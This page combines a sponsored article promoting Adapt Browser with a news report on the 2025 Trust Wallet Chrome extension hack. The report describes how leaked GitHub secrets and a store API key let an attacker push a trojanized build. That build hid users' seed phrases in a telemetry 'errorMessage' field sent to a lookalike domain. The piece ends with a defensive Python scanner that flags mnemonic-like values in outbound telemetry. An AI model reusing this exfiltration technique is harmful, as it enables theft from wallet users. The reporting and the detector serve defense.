Step 1: Prioritize Performance by Reducing Browser Overhead

One of the most effective ways to improve browsing speed is to minimize the browser’s baseline resource consumption.

Lightweight browsers take a different architectural approach by reducing background activity and avoiding unnecessary services that run regardless of user intent. This can result in:

- Faster page load times
- Improved responsiveness when switching tabs or windows
- Lower memory usage on systems running multiple applications

By focusing on essential functionality rather than feature parity, Adapt Browser, a performance-oriented browser, can remain responsive even during extended work sessions.

Step 2: Centralize Web-Based Workflows

A major source of inefficiency in browsing comes from constantly switching between tabs, windows, and desktop applications. Centralizing commonly used web tools within the browser interface helps streamline daily workflows.

This approach allows users to:

- Access frequently used web applications without opening new tabs
- Maintain visibility into active tools while browsing or researching
- Reduce time spent navigating between disconnected contexts

Adapt Browser achieves this by keeping work-critical tools accessible in one place, so that users can maintain momentum and reduce cognitive load.

Step 3: Reduce Distractions Through Interface Simplicity

Interface design plays a significant role in user focus. Excessive UI elements, notifications, and visual clutter can interrupt attention and slow task completion. A streamlined browser interface emphasizes:

- Clean layouts with minimal visual noise
- Clear separation between content and controls
- Reduced interruption during focused work

Adapt Browser supports this design philosophy for sustained attention, particularly for tasks such as reading, writing, and analysis.

Step 4: Improve Task Management With Smarter Window Usage

Opening multiple tabs is often a workaround for limited visibility. Instead of relying on dozens of tabs, modern browsers can optimize how content is displayed and managed. Effective strategies include:

- Viewing related content side-by-side without opening additional tabs
- Keeping search results visible while exploring linked pages
- Reducing duplicate browsing actions

By improving how windows and views are handled, users can stay organized while maintaining browsing speed. Adapt Browser offers this exact functionality, empowering users to adapt the browser to fit their workflow.

Applying These Principles With Adapt Browser

Adapt Browser follows a lightweight design philosophy centered on performance and task efficiency. Rather than attempting to replicate feature-heavy browser ecosystems, it focuses on optimizing core browsing behavior and integrated workflows. Key characteristics include:

- A lightweight architecture designed to reduce CPU and memory usage
- Integrated access to commonly used web applications and tools
- Interface elements designed to reduce distraction and tab clutter

Adapt is built as a non-Chromium browser, allowing greater control over resource usage and core browser behavior compared to browsers that rely on Chromium-based architectures. It is also AppEsteem certified, indicating that the browser meets established security and transparency standards for consumer software.

This approach supports users who want faster browsing and a more focused work experience without complex setup or customization. Additional technical details and updates can be found on Adapt Browser’s official website. Browsing faster and getting more done is not solely about internet speed; it is largely influenced by how the browser manages resources, workflows, and user attention. By reducing overhead, simplifying interfaces, and centralizing essential tools, a lightweight browser can significantly improve productivity.

As web-based work continues to expand, browser design choices play an increasingly important role in daily efficiency. Adopting a task-focused browsing approach can help users spend less time navigating and more time completing meaningful work.

This article is a contributed piece from one of our valued partners.


Trust Wallet Chrome Extension Hack Drains $8.5M via Shai-Hulud Supply Chain Attack

Trust Wallet on Tuesday revealed that the second iteration of the Shai-Hulud (aka Sha1-Hulud) supply chain outbreak in November 2025 was likely responsible for the hack of its Google Chrome extension, ultimately resulting in the theft of approximately $8.5 million in assets. “Our Developer GitHub secrets were exposed in the attack, which gave the attacker access to our browser extension source code and the Chrome Web Store (CWS) API key,” the company said in a post-mortem published Tuesday. “The attacker obtained full CWS API access via the leaked key, allowing builds to be uploaded directly without Trust Wallet’s standard release process, which requires internal approval/manual review.” Subsequently, the attacker is said to have registered the domain “metrics-trustwallet[.]com” and pushed a trojanized version of the extension with a backdoor that’s capable of harvesting users’ wallet mnemonic phrases to the sub-domain “api.metrics-trustwallet[.]com.”

Cybersecurity company Koi said the malicious code triggers on every unlock and not just during seed phrase import, causing sensitive data to be exfiltrated regardless of whether victims used a password or biometrics, and whether the wallet extension had been used for months or just opened once after it was updated to version 2.68. “The code loops through every wallet in the user’s account, not just the active one. If you had multiple wallets configured, all of them were compromised,” researchers Oren Yomtov and Yuval Ronen said. “Seed phrases are stuffed into a field called errorMessage inside what looks like standard unlock telemetry. A casual code review sees an analytics event tracking unlock success with some error metadata.”

The domain “metrics-trustwallet[.]com,” for its part, resolves to “138.124.70.40,” which is hosted on Stark Industries Solutions, a bulletproof hosting service provider that was incorporated in the U.K. in February 2022, just two weeks prior to Russia’s full-scale invasion of Ukraine. It has a history of enabling Russian state-sponsored cyber operations, as well as other cybercriminal activity. Interestingly, Koi’s analysis also found that querying the server directly returned the response “He who controls the spice controls the universe,” a Dune reference that echoes similar references observed in the Shai-Hulud npm incident. “The Last-Modified header reveals the infrastructure was staged by December 8 – over two weeks before the malicious update was pushed on December 24,” it added. “This wasn’t opportunistic. It was planned.”

The disclosure comes days after Trust Wallet urged about one million users of its Chrome extension to update to version 2.69 after a malicious update (version 2.68) was pushed by unknown threat actors on December 24, 2025, to the browser’s extension marketplace. The security incident ultimately led to $8.5 million in cryptocurrency assets being drained from 2,520 wallet addresses to no less than 17 wallet addresses controlled by the attacker. The first wallet-draining activity was publicly reported a day after the malicious update. Trust Wallet has since initiated a reimbursement claim process for impacted victims.

The company noted that reviews of submitted claims are ongoing and are being handled on a case-by-case basis. It also stressed that processing times may vary with each case due to the need to distinguish between victims and bad actors, and further protect against fraud. To prevent such breaches from occurring again, Trust Wallet said it has implemented additional monitoring capabilities and controls related to its release processes. “Sha1-Hulud was an industry-wide software supply chain attack that affected companies across multiple sectors, including but not limited to crypto,” the company said.

“It involved malicious code being introduced and distributed through commonly-used developer tooling. This allowed attackers to gain access through trusted software dependencies rather than directly targeting individual organizations.” Trust Wallet’s disclosure coincides with the emergence of Shai-Hulud 3.0 with increased obfuscation and reliability improvements, while still remaining laser-focused on stealing secrets from developer machines. “The primary difference lies in string obfuscation, error handling, and Windows compatibility, all aimed at increasing campaign longevity rather than introducing novel exploitation techniques,” Upwind researchers Guy Gilad and Moshe Hassan said.
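Koi's observation that the seed phrases travelled in a field that looked like ordinary unlock telemetry suggests a simple egress check for anyone reviewing a wallet build or its outbound traffic: scan analytics payloads for string values shaped like a BIP39 mnemonic. The Python below is an added example, not Trust Wallet's or Koi's code. It walks a constructed JSON telemetry event modelled on the description above (an unlock event with an errorMessage field per wallet) and reports the JSON paths whose values have a valid mnemonic word count and, when a wordlist is supplied, consist only of wordlist words. The wordlist here is a deliberately tiny subset of the 2048-word English BIP39 list, just enough for the sample; a real deployment would load the full list. Function names and sample data are my own.

```python
import json
import re

# BIP39 mnemonics are 12, 15, 18, 21 or 24 lowercase words of 3 to 8 letters.
VALID_WORD_COUNTS = {12, 15, 18, 21, 24}
WORD_RE = re.compile(r"^[a-z]{3,8}$")

# Constructed subset of the English BIP39 list: its first twelve entries plus
# "zoo" and "wrong", which appear in a well-known test mnemonic. Load the full
# 2048-word list in real use; this subset only serves the sample payloads.
DEMO_WORDLIST = frozenset("""
abandon ability able about above absent absorb abstract absurd abuse access
accident zoo wrong
""".split())


def mnemonic_like(text, wordlist=None) -> bool:
    """True if text has the shape of a BIP39 mnemonic.

    Without a wordlist this is a structural triage check (word count and word
    shape) and can match an ordinary twelve-word sentence; with the wordlist
    every word must be a BIP39 word, which removes those false hits.
    """
    if not isinstance(text, str):
        return False
    words = text.strip().split()
    if len(words) not in VALID_WORD_COUNTS:
        return False
    if not all(WORD_RE.match(w) for w in words):
        return False
    if wordlist is not None and not all(w in wordlist for w in words):
        return False
    return True


def walk_strings(node, path=""):
    """Yield (json_path, value) for every string inside a nested JSON structure."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from walk_strings(value, f"{path}.{key}" if path else key)
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from walk_strings(value, f"{path}[{index}]")
    elif isinstance(node, str):
        yield path, node


def scan_telemetry(payload: str, wordlist=None) -> list:
    """Return JSON paths in an outbound payload whose values look like seed phrases."""
    return [path for path, value in walk_strings(json.loads(payload))
            if mnemonic_like(value, wordlist)]


# Constructed telemetry payloads (not captured traffic). The first mimics an
# unlock event whose per-wallet errorMessage carries the recovery phrase.
SUSPICIOUS_PAYLOAD = json.dumps({
    "event": "wallet_unlock", "success": True, "method": "password",
    "wallets": [
        {"id": "w1", "errorMessage": "abandon ability able about above absent "
                                     "absorb abstract absurd abuse access accident"},
        {"id": "w2", "errorMessage": " ".join(["zoo"] * 11 + ["wrong"])},
    ],
})
BENIGN_PAYLOAD = json.dumps({
    "event": "wallet_unlock", "success": False, "method": "biometric",
    "wallets": [{"id": "w1", "errorMessage": "Unlock failed: biometric prompt cancelled"}],
})

if __name__ == "__main__":
    print("suspicious:", scan_telemetry(SUSPICIOUS_PAYLOAD, DEMO_WORDLIST))
    print("benign:", scan_telemetry(BENIGN_PAYLOAD, DEMO_WORDLIST))
```

The path output (for example `wallets[1].errorMessage`) is what makes this useful in review: it points at the exact field a reviewer glossed over as error metadata, and the same walker can be applied to request bodies captured from a test profile of the extension.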
